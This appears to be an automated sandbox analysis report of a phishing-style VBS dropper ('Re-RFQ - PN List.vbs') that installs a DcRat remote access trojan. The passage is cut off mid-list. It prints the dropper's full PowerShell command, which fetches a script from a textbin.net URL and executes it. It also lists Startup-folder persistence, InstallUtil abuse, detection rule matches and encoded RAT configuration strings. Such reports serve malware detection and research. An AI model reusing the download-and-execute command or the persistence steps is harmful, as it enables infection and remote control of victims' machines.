Source: 11.2.powershell.exe.1d38e3e6138.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 11.2.powershell.exe.1d38e3e6138.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 11.2.powershell.exe.1d38e50f5c8.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 11.2.powershell.exe.1d38e50f5c8.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 11.2.powershell.exe.1d38e50f5c8.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 6.2.powershell.exe.2464fbe5660.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 6.2.powershell.exe.2464fbe5660.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 6.2.powershell.exe.2464fbe5660.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 11.2.powershell.exe.1d38e3da290.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 11.2.powershell.exe.1d38e3da290.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 11.2.powershell.exe.1d38e3da290.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 6.2.powershell.exe.2464fbd9680.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 6.2.powershell.exe.2464fbd9680.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 6.2.powershell.exe.2464fbd9680.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: Process Memory Space: powershell.exe PID: 6488, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_016B94E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_016B9DB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_016BDE60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_016B71D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_016B9198
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_016BFB08

Source: Re-RFQ - PN List.vbs

Initial sample: Strings found which are bigger than 50

Source: C:\Windows\System32\wscript.exe

Section loaded: security.dll

Source: Re-RFQ - PN List.vbs

ReversingLabs: Detection: 12%

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\Re-RFQ - PN List.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy RemoteSigned -Command [System.Net.WebRequest] $Request = [System.Net.WebRequest]::Create('https://textbin.net/raw/gia9ab2dg0'); [System.Net.WebResponse] $Response = $Request.GetResponse(); [System.IO.Stream] $Stream = $Response.GetResponseStream(); [System.IO.StreamReader] $Reader = New-Object System.IO.StreamReader $Stream; [String] $FilePath = 'C:\Users\Public\gia9ab2dg0.PS1'; [String] $Command = [System.Text.Encoding]::UTF8.GetString(@(80,111,119,101,114,83,104,101,108,108,32,45,69,120,101,99,117,116,105,111,110,80,111,108,105,99,121,32,82,101,109,111,116,101,83,105,103,110,101,100,32,45,70,105,108,101,32)); [System.IO.File]::WriteAllText($FilePath, $Reader.ReadToEnd(), [System.Text.Encoding]::UTF8); Invoke-Expression ($Command + $FilePath)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy RemoteSigned -File C:\Users\Public\gia9ab2dg0.PS1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5arm45ue\5arm45ue.cmdline
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC9E1.tmp" "c:\Users\user\AppData\Local\Temp\5arm45ue\CSC76D3F8E3C7D44B4EA91093B17CA01E8C.TMP"
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SystemLogin.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy RemoteSigned -File C:\Users\Public\gia9ab2dg0.PS1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lvvchi0q\lvvchi0q.cmdline
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES14F3.tmp" "c:\Users\user\AppData\Local\Temp\lvvchi0q\CSCF59D68E9AEF44B30A0A5857885C9A6E.TMP"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy RemoteSigned -Command [System.Net.WebRequest] $Request = [System.Net.WebRequest]::Create('https://textbin.net/raw/gia9ab2dg0'); [System.Net.WebResponse] $Response = $Request.GetResponse(); [System.IO.Stream] $Stream = $Response.GetResponseStream(); [System.IO.StreamReader] $Reader = New-Object System.IO.StreamReader $Stream; [String] $FilePath = 'C:\Users\Public\gia9ab2dg0.PS1'; [String] $Command = [System.Text.Encoding]::UTF8.GetString(@(80,111,119,101,114,83,104,101,108,108,32,45,69,120,101,99,117,116,105,111,110,80,111,108,105,99,121,32,82,101,109,111,116,101,83,105,103,110,101,100,32,45,70,105,108,101,32)); [System.IO.File]::WriteAllText($FilePath, $Reader.ReadToEnd(), [System.Text.Encoding]::UTF8); Invoke-Expression ($Command + $FilePath)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy RemoteSigned -File C:\Users\Public\gia9ab2dg0.PS1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5arm45ue\5arm45ue.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC9E1.tmp" "c:\Users\user\AppData\Local\Temp\5arm45ue\CSC76D3F8E3C7D44B4EA91093B17CA01E8C.TMP"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy RemoteSigned -File C:\Users\Public\gia9ab2dg0.PS1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lvvchi0q\lvvchi0q.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES14F3.tmp" "c:\Users\user\AppData\Local\Temp\lvvchi0q\CSCF59D68E9AEF44B30A0A5857885C9A6E.TMP"

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\Documents\20220516

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_q0t1u4d1.0tt.ps1

Jump to behavior

Source: classification engine

Classification label: mal100.troj.expl.evad.winVBS@22/28@3/4

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: 17.0.InstallUtil.exe.400000.2.unpack, Client/Helper/Methods.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 17.0.InstallUtil.exe.400000.2.unpack, Client/Helper/Methods.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 17.2.InstallUtil.exe.400000.0.unpack, Client/Helper/Methods.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 17.2.InstallUtil.exe.400000.0.unpack, Client/Helper/Methods.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 14.2.InstallUtil.exe.400000.0.unpack, Client/Helper/Methods.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 14.2.InstallUtil.exe.400000.0.unpack, Client/Helper/Methods.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 14.0.InstallUtil.exe.400000.0.unpack, Client/Helper/Methods.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 14.0.InstallUtil.exe.400000.0.unpack, Client/Helper/Methods.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 17.0.InstallUtil.exe.400000.1.unpack, Client/Helper/Methods.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 17.0.InstallUtil.exe.400000.1.unpack, Client/Helper/Methods.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 14.0.InstallUtil.exe.400000.4.unpack, Client/Helper/Methods.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 14.0.InstallUtil.exe.400000.4.unpack, Client/Helper/Methods.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 14.0.InstallUtil.exe.400000.3.unpack, Client/Helper/Methods.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 14.0.InstallUtil.exe.400000.3.unpack, Client/Helper/Methods.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 14.0.InstallUtil.exe.400000.1.unpack, Client/Helper/Methods.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 14.0.InstallUtil.exe.400000.1.unpack, Client/Helper/Methods.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 14.0.InstallUtil.exe.400000.2.unpack, Client/Helper/Methods.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 14.0.InstallUtil.exe.400000.2.unpack, Client/Helper/Methods.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 17.0.InstallUtil.exe.400000.0.unpack, Client/Helper/Methods.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 17.0.InstallUtil.exe.400000.0.unpack, Client/Helper/Methods.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 17.0.InstallUtil.exe.400000.3.unpack, Client/Helper/Methods.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 17.0.InstallUtil.exe.400000.3.unpack, Client/Helper/Methods.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 17.0.InstallUtil.exe.400000.4.unpack, Client/Helper/Methods.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 17.0.InstallUtil.exe.400000.4.unpack, Client/Helper/Methods.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Source: 14.2.InstallUtil.exe.400000.0.unpack, Client/Settings.cs	Base64 encoded string: 'Zg9VSZv/vsUnEQBzhfXpKPjYm70KkS5MxCRhZ1CLxaONi86O1tioh7cto+j8y2tHB120cTLyZ51HkueXBxsY1A==', 'v23I0uaw1sk1B/UV7MF/i7PWa4pkjHGwD3HGXSar/bDyBGI64sWLOksmjWy56FKsz15Se74UdHLPfujhZYMKxg==', 'zJ/1sVpcObuNfLTrUkZTTh0ZZ7HsCe9LfsAJMBq5glbYy/Bo8lHq+irEJXxzSoyZEMMH32ZAIPgbMMutNwnn5Q==', 'qZK17jl/J4a8Q7oQLlEdW17aFbsly0z2BJF/eEtiuV/2JCpg+zSuK6y7vk86iUp/mO8wdvSbP6wHKhfkIu5t0UiFHk4hrr683x91+Aem184=', 'Uy3qA4XUoTvhzLn2xXYwE8q9FkOCN3aQpvfcYdG/H+f8v+XEnDM0YhpENrKWgLWddtEKdNAxt2VysNAb7olyKY7LrxU/GNx4Pv9cz7nzZNYWKWZYZZ/rkPFJp3wloY9XZl7JY1Y2HMJiZnuyJL+8NMwpoYiWQfTEXVCargNl8n4bBen17eB6rx/GidE5k3pE711DDJr6kz5v3TdgYv3CdBrrSDVbB933SLP83T2TWOGhB3+F7ATHxPYRUCtLUOnot/z8dlwQjW206agkbgvmoL6rSN9YsodPleYlNrUl9rXXigSDa55X70UlTmDwOUo4HmC7/xp0fBQ3jZcJ5XfMVhQjfDJL73S9pUd/fw2pSeHLFoZSewdfvZi96x5sGBro2DGC1XuXt2Mw2QnTuFYumY2EheX8gL0YrlgO4GzqrrTtSvAuCvzoQQiDAvS72FmEAevMW2fmUdEcv3CXsE3eLfYlzxHsQByU8uZYuVD2oC536lcBVBVbZaLwZHGKB+DQrJv3MFfgwGkR05TFDmU5ixHRPd+uV+ZkKaxwHQCZG1svcq/7OaOCsy1HouuH64AQql+f1bTNO+thWbEI7uXSY6tBHbG1NurTlvZD/RnjoIdaE7q0CvrPSeHPekVYDUEO1ijAbCNrXzq2u5t5TE+ZTwyvqtMZWRhy89TOOzKWZXNy9TcHmkOAy+jBe8e+sXGSUO0u5iqhbaw3sRXtamgiamhoqN8hTdOz+vfJDC8A7zCndUdKUfoAQ7B2gIqQ15R7PvpwrZpXL323GesDZDaEtCzqDcydI5UKH8fMZyB+TrHKqFplIkYI9i3HTw7/fvZRdIz33O1eXNx7jreoRxVT99QEx1ChxMlkSni44R7Dn75VsRwW+mxXoX/aJ1X2VPCKWW7NYdVu43pnRZqXqnAbmAe02orAx2fsJJ+a5ya5XKFs+C/FDHeXd81WpwZkXBZFvdS+okigOyS5ZokUz5eMgo35wHhQFzrLAdGxP+J714yIfSvS+rUlOYYXQgdKpTIM9r6/tQoRhRF/iB+WgYBuMrKSfQ5BZRV68Xn2ihArOnI3EUFGnlYynk3RcH95w2LC', 's4eubzQAqwdqZLczo80oYV+6aCOh7nxDIxvmJ9WhBE6RFSxYSwBkQghrXU9kGnOK/REsRpm+BzllXO4eNfUCQPNl8AcQOPWz3R/nZYFUtob6RnDZYK3wTmfYpaQhzHICQQtt6u7KmjUJYTWDIFpsU7UMrEWFJnQJ+l1uS73RR9N6R+FRwmNCVdhewgMCetk+zRXEc1snGJTltcCPW3NU4DNyfSubi8qJkEdL1619D94HVZGAREH1A2LgGBclrTXO1pzILZ/E0DnUewkwr+MNxhMAF44NGHV/7rsdeC5OiXY=', 'zViY6nboISUvBmx5Joto+trVzMpeLLRgMZpFO9m57Mi49ucYpxCH88awKiQaDEcjveaXDJBt0rcy/llBm5rtUg==', 'M72wAaVCyHpUE0p/u2OgzlNEXrDLNJODlaMVbr2TWtwW/kAW5rxYap/mHuiOQvxbAGq9KA1kPWuS051TZkMy9w==', 'Sb7k9N6y/mjln0+cqCNQvo00pCerPyhdvCCZIzPJia3lj82KZYQeECX3k++HZ8gO4e8gjBjgr2+5d1mjRmJUQQ==', '/Fpw2Tycm40na8g2y1lBcAMFaYxWmCKR6KfbuikP8qY4RKVl3XFrj5obCNRk4BcAPfbYgjynREIHRciyq+PR3w=='
Source: 14.2.InstallUtil.exe.400000.0.unpack, Client/Install/NormalStartup.cs	Base64 encoded string: 'U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA=='
Source: 14.0.InstallUtil.exe.400000.1.unpack, Client/Install/NormalStartup.cs	Base64 encoded string: 'U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA=='
Source: 14.0.InstallUtil.exe.400000.1.unpack, Client/Settings.cs	Base64 encoded string: 'Zg9VSZv/vsUnEQBzhfXpKPjYm70KkS5MxCRhZ1CLxaONi86O1tioh7cto+j8y2tHB120cTLyZ51HkueXBxsY1A==', 'v23I0uaw1sk1B/UV7MF/i7PWa4pkjHGwD3HGXSar/bDyBGI64sWLOksmjWy56FKsz15Se74UdHLPfujhZYMKxg==', 'zJ/1sVpcObuNfLTrUkZTTh0ZZ7HsCe9LfsAJMBq5glbYy/Bo8lHq+irEJXxzSoyZEMMH32ZAIPgbMMutNwnn5Q==', 'qZK17jl/J4a8Q7oQLlEdW17aFbsly0z2BJF/eEtiuV/2JCpg+zSuK6y7vk86iUp/mO8wdvSbP6wHKhfkIu5t0UiFHk4hrr683x91+Aem184=', 'Uy3qA4XUoTvhzLn2xXYwE8q9FkOCN3aQpvfcYdG/H+f8v+XEnDM0YhpENrKWgLWddtEKdNAxt2VysNAb7olyKY7LrxU/GNx4Pv9cz7nzZNYWKWZYZZ/rkPFJp3wloY9XZl7JY1Y2HMJiZnuyJL+8NMwpoYiWQfTEXVCargNl8n4bBen17eB6rx/GidE5k3pE711DDJr6kz5v3TdgYv3CdBrrSDVbB933SLP83T2TWOGhB3+F7ATHxPYRUCtLUOnot/z8dlwQjW206agkbgvmoL6rSN9YsodPleYlNrUl9rXXigSDa55X70UlTmDwOUo4HmC7/xp0fBQ3jZcJ5XfMVhQjfDJL73S9pUd/fw2pSeHLFoZSewdfvZi96x5sGBro2DGC1XuXt2Mw2QnTuFYumY2EheX8gL0YrlgO4GzqrrTtSvAuCvzoQQiDAvS72FmEAevMW2fmUdEcv3CXsE3eLfYlzxHsQByU8uZYuVD2oC536lcBVBVbZaLwZHGKB+DQrJv3MFfgwGkR05TFDmU5ixHRPd+uV+ZkKaxwHQCZG1svcq/7OaOCsy1HouuH64AQql+f1bTNO+thWbEI7uXSY6tBHbG1NurTlvZD/RnjoIdaE7q0CvrPSeHPekVYDUEO1ijAbCNrXzq2u5t5TE+ZTwyvqtMZWRhy89TOOzKWZXNy9TcHmkOAy+jBe8e+sXGSUO0u5iqhbaw3sRXtamgiamhoqN8hTdOz+vfJDC8A7zCndUdKUfoAQ7B2gIqQ15R7PvpwrZpXL323GesDZDaEtCzqDcydI5UKH8fMZyB+TrHKqFplIkYI9i3HTw7/fvZRdIz33O1eXNx7jreoRxVT99QEx1ChxMlkSni44R7Dn75VsRwW+mxXoX/aJ1X2VPCKWW7NYdVu43pnRZqXqnAbmAe02orAx2fsJJ+a5ya5XKFs+C/FDHeXd81WpwZkXBZFvdS+okigOyS5ZokUz5eMgo35wHhQFzrLAdGxP+J714yIfSvS+rUlOYYXQgdKpTIM9r6/tQoRhRF/iB+WgYBuMrKSfQ5BZRV68Xn2ihArOnI3EUFGnlYynk3RcH95w2LC', 's4eubzQAqwdqZLczo80oYV+6aCOh7nxDIxvmJ9WhBE6RFSxYSwBkQghrXU9kGnOK/REsRpm+BzllXO4eNfUCQPNl8AcQOPWz3R/nZYFUtob6RnDZYK3wTmfYpaQhzHICQQtt6u7KmjUJYTWDIFpsU7UMrEWFJnQJ+l1uS73RR9N6R+FRwmNCVdhewgMCetk+zRXEc1snGJTltcCPW3NU4DNyfSubi8qJkEdL1619D94HVZGAREH1A2LgGBclrTXO1pzILZ/E0DnUewkwr+MNxhMAF44NGHV/7rsdeC5OiXY=', 'zViY6nboISUvBmx5Joto+trVzMpeLLRgMZpFO9m57Mi49ucYpxCH88awKiQaDEcjveaXDJBt0rcy/llBm5rtUg==', 'M72wAaVCyHpUE0p/u2OgzlNEXrDLNJODlaMVbr2TWtwW/kAW5rxYap/mHuiOQvxbAGq9KA1kPWuS051TZkMy9w==', 'Sb7k9N6y/mjln0+cqCNQvo00pCerPyhdvCCZIzPJia3lj82KZYQeECX3k++HZ8gO4e8gjBjgr2+5d1mjRmJUQQ==', '/Fpw2Tycm40na8g2y1lBcAMFaYxWmCKR6KfbuikP8qY4RKVl3XFrj5obCNRk4BcAPfbYgjynREIHRciyq+PR3w=='
Source: 14.0.InstallUtil.exe.400000.4.unpack, Client/Install/NormalStartup.cs	Base64 encoded string: 'U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA=='
Source: 14.0.InstallUtil.exe.400000.4.unpack, Client/Settings.cs	Base64 encoded string: 'Zg9VSZv/vsUnEQBzhfXpKPjYm70KkS5MxCRhZ1CLxaONi86O1tioh7cto+j8y2tHB120cTLyZ51HkueXBxsY1A==', 'v23I0uaw1sk1B/UV7MF/i7PWa4pkjHGwD3HGXSar/bDyBGI64sWLOksmjWy56FKsz15Se74UdHLPfujhZYMKxg==', 'zJ/1sVpcObuNfLTrUkZTTh0ZZ7HsCe9LfsAJMBq5glbYy/Bo8lHq+irEJXxzSoyZEMMH32ZAIPgbMMutNwnn5Q==', 'qZK17jl/J4a8Q7oQLlEdW17aFbsly0z2BJF/eEtiuV/2JCpg+zSuK6y7vk86iUp/mO8wdvSbP6wHKhfkIu5t0UiFHk4hrr683x91+Aem184=', 